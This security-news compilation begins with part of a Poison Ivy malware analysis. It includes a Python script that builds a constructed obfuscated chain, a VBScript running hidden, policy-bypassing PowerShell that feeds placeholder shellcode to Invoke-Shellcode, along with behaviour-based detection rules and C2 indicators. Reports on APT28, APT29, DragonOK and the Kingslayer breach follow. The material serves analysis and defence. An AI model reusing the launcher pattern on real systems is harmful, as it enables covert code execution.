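    binaries = [layer["payload"] for layer in layers if layer["kind"] == "binary"]
    return layers, indicators, binaries


def build_sample():
    """Constructed three-layer chain mirroring the one in the analysis."""
    # Innermost: PowerShell handing the shellcode to an injector. Invoke-Shellcode is
    # PowerSploit's function name; this call line is assumed, not copied from the malware.
    ps = "$sc = [Convert]::FromBase64String('%s'); Invoke-Shellcode -Shellcode $sc -Force" % (
        base64.b64encode(FAKE_SHELLCODE).decode())
    enc = base64.b64encode(ps.encode("utf-16-le")).decode()
    # Middle: VBScript launching a hidden, policy-bypassing PowerShell with -Enc.
    vbs = ('Set sh = CreateObject("WScript.Shell")\r\n'
           'sh.Run "powershell.exe -w hidden -ep bypass -Enc %s", 0, False\r\n' % enc)
    # Outer: the whole VBScript base64-encoded, as served by the blog page.
    return base64.b64encode(vbs.encode("ascii")).decode()


if __name__ == "__main__":
    found_layers, found_flags, found_bins = analyse(build_sample())
    for layer in found_layers:
        print(layer["depth"], layer["kind"], layer["payload"][:60])
    print("indicators:", sorted(found_flags), "binary payloads:", len(found_bins))
```

The UTF-16LE check is the part analysts most often get wrong by hand: a -Enc blob decoded as plain ASCII looks like text interleaved with NUL bytes and is easy to mistake for binary, which is exactly where a manual decoding loop stalls.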

“Copy/Pasting Powersploit/CodeExecution PoC”
The PowerShell code carried by the VBScript is a copy-paste of the PowerSploit CodeExecution proof-of-concept code that is publicly available on GitHub: the same file, .ps1 extension included.

Here is the project’s GitHub page with its documentation:


Figure 3. The PowerSploit / CodeExecution web page on GitHub.

The documentation states: “Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process”. Easy: this is hacking prêt-à-porter.

And here is the first lesson learned from this investigation: how much damage keeping such code publicly available on GitHub does to the user community. PowerSploit is a penetration-testing framework, which is exactly what makes its modules a ready-made toolkit for attackers; we cannot stress enough how important it would be not to have this source code ready for use.

The Shellcode analysis
Let’s look at the shellcode, because the most important task now is to reverse it and understand its purpose: why it is injected on the victims’ computers, which techniques and mechanisms it uses, what it does and where it connects. The story is getting exciting!

Again the shellcode is base64-encoded; once decoded it looks like the picture below:


Figure 4. The Shellcode.

Reversing it looks like a long task, and again MalwareMustDie shows a neat trick for assembling the shellcode into an executable file that can be run for analysis:

“Saving the shellcode data in the .text section of the assembly file and the entry point (EP) will be “adjusted” by the compiler during compilation process therefore you can execute this shellcode as a binary PE file. This method is very useful when analysing shellcodes. And by using a Unix environment you can create this PE without risking an infection.”

The figure below shows the process:


Figure 5. How to turn the shellcode into a usable .exe file

The result is a “beautiful” stupid-shellcode.exe file, ready to run so that its behaviour can be observed for further investigation.

Running the malware reveals its behaviour: it collects information from the victim’s computer and calls back to its C2 server, which then directs the malicious actions. Payload behaviour analysis has always been fascinating, and security researchers can spend days “following the money”.

In the end there is no doubt: we are facing the famous, or rather infamous, Poison Ivy.

Poison Ivy Classical Scheme in the field
Running the shellcode shows that it makes many API calls into system DLLs, mostly kernel-related ones, and the first stage of the shellcode trace shows it spawning a decoy process named userinit.exe into which the malicious code is injected and then executed.

Here is an image from the MalwareMustDie analysis:


Figure 6. The fake process userinit.exe created and injected.

MalwareMustDie’s deep knowledge of malware shows here: he is able to find many elements that trace back to Poison Ivy.

The combination of DLLs used, he says, “is showing a typical pattern of the threat too. Moreover, the date stamped in the MUTEX name is mostly used by Poison Ivy”.

The malware then performs other operations:

creating a file called “Plug1.dat”,
opening a socket for later use,
querying machine information from “HKEY_LOCAL_MACHINE\SYSTEM\Setup”.
No doubt about it: this is Poison Ivy.
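The behavioural indicators listed above turned into detection rules, as an added example (not MalwareMustDie’s code): it evaluates constructed endpoint events against three checks, a userinit.exe launched outside its normal context, the Plug1.dat drop and a read of HKLM\SYSTEM\Setup, and flags a host only when two or more fire. The event shape and field names (Image, ParentImage, TargetFilename, TargetObject) are borrowed from Sysmon but the events themselves are constructed; Sysmon does not record registry reads, so the third rule assumes telemetry that does. That a legitimate userinit.exe runs from System32 with winlogon.exe as its parent is a Windows fact, not something from the article.

```python
"""Poison Ivy behavioural indicators as detection rules over endpoint events.

Added example, not MalwareMustDie's code. Events are constructed dicts using
Sysmon field names (Image, ParentImage, TargetFilename, TargetObject); Sysmon
does not log registry reads, so the RegistryRead rule assumes telemetry that does.
"""
import ntpath

SYSTEM32 = r"c:\windows\system32"


def _base(path):
    return ntpath.basename(path).lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def rule_decoy_userinit(ev):
    """userinit.exe is normally started by winlogon.exe from System32 at logon;
    any other image path or parent matches the decoy process from the analysis."""
    if ev["type"] != "ProcessCreate" or _base(ev["Image"]) != "userinit.exe":
        return False
    return not (_dir(ev["Image"]) == SYSTEM32 and _base(ev["ParentImage"]) == "winlogon.exe")


def rule_plug1_drop(ev):
    return ev["type"] == "FileCreate" and _base(ev["TargetFilename"]) == "plug1.dat"


def rule_setup_key_read(ev):
    return ev["type"] == "RegistryRead" and ev["TargetObject"].lower().startswith(r"hklm\system\setup")


RULES = {
    "decoy_userinit": rule_decoy_userinit,
    "plug1_drop": rule_plug1_drop,
    "setup_key_read": rule_setup_key_read,
}


def evaluate(events):
    """host -> set of rule names that fired on that host."""
    hits = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(ev["host"], set()).add(name)
    return hits


def flagged_hosts(events, min_rules=2):
    """Hosts where at least `min_rules` independent indicators fired; a lone
    Plug1.dat or a lone odd userinit.exe is worth a look but is not a verdict."""
    return sorted(h for h, names in evaluate(events).items() if len(names) >= min_rules)


# Constructed events: ws01 is a normal logon, ws02 matches the chain from the
# analysis, ws03 shows only one weak signal.
EVENTS = [
    {"host": "ws01", "type": "ProcessCreate",
     "Image": r"C:\Windows\System32\userinit.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
    {"host": "ws02", "type": "ProcessCreate",
     "Image": r"C:\Windows\System32\userinit.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"host": "ws02", "type": "FileCreate",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\Plug1.dat"},
    {"host": "ws02", "type": "RegistryRead", "TargetObject": r"HKLM\SYSTEM\Setup"},
    {"host": "ws03", "type": "FileCreate", "TargetFilename": r"D:\backup\Plug1.dat"},
]

if __name__ == "__main__":
    for host, names in sorted(evaluate(EVENTS).items()):
        print(host, sorted(names))
    print("flagged:", flagged_hosts(EVENTS))
```

The parent-process check is what makes the first rule usable: the attacker runs the real userinit.exe from System32, so an image-path check alone would never fire, whereas userinit.exe with a parent other than winlogon.exe is rare enough on a workstation to be worth an alert on its own.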

But, where is the C&C server?
The last question, to close the loop: where is the command and control server located?

Looking closer at the WS2_32.DLL imports, we see some interesting calls:

socket(),
gethostbyname()
connect().
These revealed the hostname and IP address used for the callback to the command and control server, which is hosted in Seoul, South Korea.


Figure 7. C&C server based in Korea.

Network/BGP information: 61.97.243.15 | AS4766 | 61.97.243.0/24 | KIXS-AS | KR | kisa.or.kr | KRNIC

Looking at the hostname, web.outlooksysm.net, a WHOIS query returns, among other details, the registrar: a company based in Shanghai.


Figure 8. Whois of the C&C server of the Poison Ivy malware.

Conclusion
This APT campaign used multiple accounts on Geocities Japan, which raises the possibility that a larger APT campaign is being conducted against Mongolian victims.

The information here is drawn from the MalwareMustDie research and analysis linked above.

This kind of campaign has been named “Free Hosting (pivoted) APT PowerSploit Poison Ivy” (FHAPPI) by the gentleman who provided the translation from Japanese, Mr. El Kentaro, making us very F-Happy to learn new methods and techniques.

Odisseus is an Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing, and development.


Serious Breach Linked to Chinese APTs Comes to Light

22.2.2017 securityweek APT

Several major organizations may have been affected by a breach suffered by an IT services and software provider. The attack, linked to threat actors believed to be located in China, took place in 2015, but it has only now come to light.

A report published earlier this month by RSA describes Kingslayer, a supply chain attack that apparently targeted system administrators in some large organizations. The attackers breached the systems of a company that offers event log analyzers and replaced a legitimate application and its updates with a backdoored version.

The malicious version of the software was delivered between April 9 and April 25, 2015, and it was downloaded by at least one Windows system administrator working for a defense contractor.

While it’s unclear exactly how many organizations downloaded the backdoored software in the April 9-25 timeframe, RSA said the portal that hosted it had numerous subscribers, including four major telecoms providers, over ten western military organizations, more than two dozen Fortune 500 companies, five major defense contractors, and tens of IT solutions providers, government organizations, banks and universities.

While RSA has not named the company whose systems were compromised, investigative journalist Brian Krebs determined that it was Canada-based Altair Technologies Ltd. The company offers firewall log analyzers, a Windows event monitoring product, and a repository of troubleshooting information related to Windows event log messages (EventID.Net).

The EventID.Net website hosted EvLog, the software hijacked by the attackers. A notice posted on the site in June 2016 provides some details on the incident and recommendations for potentially affected users.

However, as Krebs pointed out, the advisory does not appear to have been shared on social media and there was no link to it from anywhere on the site – a link was added this week after the journalist contacted Altair Technologies. The company told Krebs it had no way of knowing who downloaded the software so potential victims were not notified directly either.

While Altair representatives said they don’t expect large organizations to use the EvLog tool, the company’s main website claims the EventID.Net portal has helped millions of users worldwide. SecurityWeek has reached out to Altair Technologies for clarifications.

RSA pointed out that the defense contractor targeted by Kingslayer was attacked only 11 weeks after the breach of Altair’s systems, which suggests that the attackers may have focused on other targets in those 11 weeks.

Evidence uncovered by RSA suggests that the attack was linked to Shell Crew, aka Deep Panda, and Codoso, aka Sunshop Group. Both Shell Crew and Codoso are advanced persistent threat (APT) groups believed to be operating out of China.

RSA also pointed to similarities with another supply chain attack known as the 2014 Monju incident, which targeted a nuclear facility in Japan. That attack was also linked to China.


Google was aware of Russian APT28 group years before others
16.2.2017 securityweek
APT

Lorenzo Bicchierai from Motherboard shared an interesting private report on Russian cyber espionage operations conducted by APT28; the document was written by Google and obtained by Motherboard from two independent sources.
The report, dated 2014, includes information Google collected on the group’s hacking activities.

In October 2014, security experts at FireEye linked cyber attacks against a number of Eastern European countries to a Russian nation-state actor dubbed APT28.
The report published by FireEye revealed that the APT28 is behind long-running cyber espionage campaigns that targeted also US defense contractors, European security organizations and Eastern European government entities.

FireEye researchers collected evidence that the APT28 group is linked to the Russian Government, the team of hackers “does not appear to conduct widespread intellectual property theft for economic gain, but instead is focused on collecting intelligence that would be most useful to a government.”

“APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe,” FireEye reported.


The group focused its hacking campaign on targets that would be of interest to Russia, such as the Caucasus region with a focus on Georgia.

That was the beginning of the story; today several names are used for this nation-state actor, including Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team.

Just a couple of days ago security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian cyberespionage group.

Before FireEye published its report in 2014, several companies were already investigating the threat actor’s attacks, Google among them.

Google “penned a 40-page technical report” on the activities of the APT28 group, a valuable document since it had never been published before.

“This sort of document, which Motherboard obtained from two independent sources, may be a common sight in the threat intelligence industry, but the public rarely gets to see what such a report from Google looks like.” wrote Lorenzo Bicchierai. “The report draws from one of Google’s most interesting sources of data when it comes to malware and cybersecurity threats: VirusTotal, a public malware repository that the internet giant acquired in 2012.”
The document explicitly refers to two malware families, Sofacy and X-Agent, that “are used by a sophisticated state-sponsored group targeting primarily former Soviet republics, NATO members, and other Western European countries.”

This means Google knew about the threat years before its public disclosure: Google attributed the attacks to APT28 and linked them to the Russian Government much earlier than FireEye, ESET or CrowdStrike.

“It looks like Google researchers were well aware of Sofacy before it was publicly disclosed.”

The title of the document is explicit, “Peering into the Aquarium”, a reference to the headquarters of the GRU military intelligence agency, popularly known as “The Aquarium.”

According to the report, the VirusTotal submission share of X-Agent and Sofacy by country was highest for Georgia, Romania, Russia and Denmark.


Google’s experts tried to profile APT28 and noticed that the group used the sophisticated X-Agent only to compromise “high-priority targets”, while it made wide use of the Sofacy malware in its broader campaigns; Sofacy was estimated to be three times more common than X-Agent in the wild.

“As a first-stage tool, Sofacy is used relatively indiscriminately against potential targets. X-Agent is reserved for high-priority targets. This is borne out by the data. VirusTotal submissions show that Sofacy was three times more common than X-Agent in the wild, with over 600 distinct samples in the data set.” states the report.

The report includes technical details on APT28 operations; it is notable that Google’s security team identified the threat years before other security firms.


BitDefender found the first MAC OS version of the X-Agent used by the APT28
15.2.2017 securityaffairs
APT

Security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian APT28 cyberespionage group.
Security experts at BitDefender have discovered a MAC OS malware program that’s likely part of the arsenal of the dreaded Russian APT 28 group (aka Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team). The Russian nation-state actor was involved in the cyber attacks against the U.S. Democratic National Committee during the 2016 Presidential election.


Researchers believe the group developed the malware called Sofacy or X-Agent, which has been associated only with its espionage campaigns.

The experts observed several strains of the X-Agent specifically designed to compromise Windows, Linux, iOS and Android OSs.

Now researchers at Bitdefender have spotted the first version of the X-Agent that was developed to compromise MAC OS systems.

The security firm hasn’t revealed how it has discovered the MAC OS version of the X-Agent, and currently, there is no information on the attack chain.

“APT 28 operators have upped their game – the Xagent payload now can target victims running Mac OS X to steal passwords, grab screens and steal iPhone backups stored on the Mac.” reads the analysis published by Bitdefender.

The X-Agent is a modular backdoor that was most likely planted on the target machines via the Komplex downloader.

X-Agent can load additional modules and can be used as a backdoor or for reconnaissance of the target system, gathering information on the host’s hardware and software components.

In September 2016, Palo Alto Networks researcher Ryan Olson discovered that Fancy Bear had used the Komplex trojan to target organizations in the aerospace sector that were using the MacKeeper antivirus software.

“The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload.” reads the analysis published by PaloAlto in September 2016. “Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.”

The Komplex malware has numerous similarities with the Carberp trojan; it was improved to gain access to both PC and OS X systems and uses the same command-and-control servers.

The researchers noticed that Komplex’s C2 domain appleupdate[.]org was not used in the past by the group, while both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to the activity of the APT 28.

The new MAC OS X-Agent uses domain names similar to those used by the Komplex Trojan, differing only in the TLD. The researchers also noticed identical project path strings inside both the Komplex and X-Agent samples, which suggests the same development team is behind both.

“Other indicators show that today’s sample also reports to a C&C URL that is identical to the Sofacy/APT28/Sednit Komplex OSX Trojan, minus the TLD (apple-[*******].net for Komplex vs apple-[*******].org for Xagent).” states Bitdefender.

Summarizing, the Komplex component discovered in September 2016 has been exclusively used as a downloader and installer for the X-Agent binary.

The investigation is ongoing … stay tuned!


Russian APT 29 group launched cyber attacks against Norwegian authorities
4.2.2017 securityaffairs
APT

The Norwegian intelligence agency PST is one of the targets of spear phishing attacks launched by the Russian APT 29 group.
The dreaded Russian APT 29 group is back: the Norwegian authorities accuse Russia of cyber attacks that hit the foreign ministry, the intelligence service and other institutions.

“Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails,” confirmed Arne Christian Haugstoyl, an official with Norway’s intelligence service PST, in an interview with the television channel TV2.

Norway was informed of the ongoing attacks by an allied state and is investigating the case, but the motivation behind the attack is still unclear.

“It’s difficult to know what the goal” he added.

Although legislative elections are scheduled for September 2017, experts believe the attacks are not linked to the vote.

The APT 29 group is more likely interested in Norway’s NATO membership, especially in the wake of the Ukraine crisis.

Recently the Norwegian Government also allowed the deployment of 300 US soldiers on its soil.

The Norwegian official confirmed that the APT 29 group has links to the Russian authorities; the hackers are also accused of having interfered with the recent US Presidential Election.


At the time of writing it is not clear whether the hackers exfiltrated sensitive information; according to Verdens Gang (VG), PST spokesman Martin Bernsen said there was “no reason to believe that classified information had been obtained in connection with the attack.”

According to the Norwegian Government, the hackers also targeted the national radiation protection agency, the parliamentary group of the Labour party and a school.

Recently Moscow refused visas to two senior Norwegian lawmakers, a decision considered by the Government of Oslo as “unjustifiable”.

Moscow explained the visa refusal was its response to Norway’s position on the EU economic sanctions against Russia over the Ukraine crisis.


China-Linked DragonOK APT Group continues updating tools and tactics
8.1.2017 securityaffairs
APT

The China-linked DragonOK continues updating tools and tactics and targeted entities in various countries, including Russia and Tibet.
It was September 2014, when security researchers at FireEye spotted for the first time the cyber espionage activities of a Chinese state-sponsored group dubbed DragonOK.

At the time, FireEye discovered two hacking campaigns conducted by distinct groups operating in separate regions of China that seem to work in parallel.

The first team, named Moafee, targeted military and government organizations that were in some way involved in the South China Sea dispute. As explained by FireEye researchers in a blog post, the group appears to operate from Guangdong Province and hit various organizations, including entities working in the defense industry in the United States.

The second team, dubbed DragonOK, conducted corporate espionage operations on high-tech and manufacturing companies in Japan and Taiwan.

DragonOK is back and recently targeted Japanese organizations in several industries, including manufacturing, technology, energy, higher education and semiconductor.

While Japan is considered the main target of the APT, hackers also targeted individuals or organizations in Taiwan, Tibet, and Russia.

According to experts at Palo Alto Networks, one of the malware families used by the DragonOK APT, dubbed Sysget, was used to target entities in Taiwan.

Sysget was delivered both directly as phishing email attachments and inside RTF documents exploiting the CVE-2015-1641 flaw, which in turn ran a unique shellcode. The experts observed three distinct new versions of Sysget, each improved to make detection and analysis by security solutions harder.

Palo Alto also observed DragonOK hackers using two other malware families, IsSpace and TidePool.


“IsSpace” is an evolution of the NFlog backdoor used by both DragonOK and Moafee. The second malware TidePool was observed earlier this year in targeted attacks powered by a different Chinese APT group, dubbed Operation Ke3chang.

Back in 2013, the security researchers at FireEye spotted a group of China-Linked hackers that conducted an espionage campaign on foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang,’ the same threat actors were spotted targeting personnel at Indian embassies across the world earlier this year.

DragonOK has now used the TidePool malware in targeted attacks against organizations in Russia and Tibet.

The analysis published by Palo Alto Networks researchers included links between the C&C domains of the various malware used by the DragonOK (i.e. TidePool, IsSpace and Sysget), and other Indicators of Compromise.

“The DragonOK group are quite active and continue updating their tools and tactics. Their toolset is being actively developed to make detection and analysis more difficult. Additionally, they appear to be using additional malware toolsets such as TidePool.” states Palo Alto Networks. “While Japan is still the most-targeted region by this group, they look to be seeking out victims in other regions as well, such as Taiwan, Tibet, and Russia.”


Fancy Bear APT tracked Ukrainian artillery units with an Android implant
22.12.2016 securityaffairs
APT

The Russian APT group Fancy Bear used a malware implant on Android devices to track and target Ukrainian artillery units from late 2014 through 2016.
The popular hacking group known as Fancy Bear, APT 28, Pawn Storm, Sednit or Sofacy is once again in the headlines. Experts from the cyber security firm CrowdStrike reported that the alleged Russian nation-state actor used a malware implant on Android devices to track and target Ukrainian artillery units from late 2014 through 2016.

The malicious code was used to spy on communications and retrieve location data of the Ukrainian artillery units; this information would likely have been used by pro-Russian separatists fighting in eastern Ukraine to launch attacks against those units. Late in the summer of 2016, researchers from CrowdStrike Intelligence began investigating a curious Android Package (APK) named ‘Попр-Д30.apk’ (MD5: 6f7523d3019fa190499f327211e01fcb). The APK contained a number of Russian-language artifacts that were military in nature. The attackers trojanized a legitimate app, but there is no evidence the application was ever made available in the official Android app store.

“From late 2014 and through 2016, FANCY BEAR X-Agent implant was covertly distributed on Ukrainian military forums within a legitimate Android application developed by Ukrainian artillery officer Yaroslav Sherstuk.” states the report published by Crowdstrike. “The original application enabled artillery forces to more rapidly process targeting data for the Soviet-era D-30 Howitzer employed by Ukrainian artillery forces reducing targeting time from minutes to under 15 seconds. According to Sherstuk’s interviews with the press, over 9000 artillery personnel have been using the application in Ukrainian military.”


“Initial research identified that the filename suggested a relationship to the D-30 122mm towed howitzer, an artillery weapon first manufactured in the Soviet Union in the 1960s but still in use today.” states the report.

If the experts’ analysis is correct, it means that Russian military strategy makes extensive use of hacking campaigns both to influence the internal affairs of foreign governments and to support military operations.

Experts believe the Fancy Bear hacker group operates on behalf of the Russia’s military intelligence agency, GRU. According to the US intelligence, the group was responsible for hacks during the 2016 Presidential Election, its hacking operations aimed to support Donald Trump.

Russia has repeatedly denied hacking accusations.

The malicious code developed by Fancy Bear to track Ukrainian artillery units has many similarities with the one used in the hack of the Democratic National Committee.

Is the malicious implant effective?

According to open source data cited in the report, Ukrainian artillery forces lost over 50% of their weapons in the two years of conflict and over 80% of their D-30 howitzers, the highest percentage of loss of any artillery piece in Ukraine’s arsenal.

One very interesting aspect of the story is the implant itself, a previously unseen variant of X-Agent. Its use demonstrates “FANCY BEAR’s expansion in mobile malware development from iOS-capable implants to Android devices”.

Further details are available on the CrowdStrike report.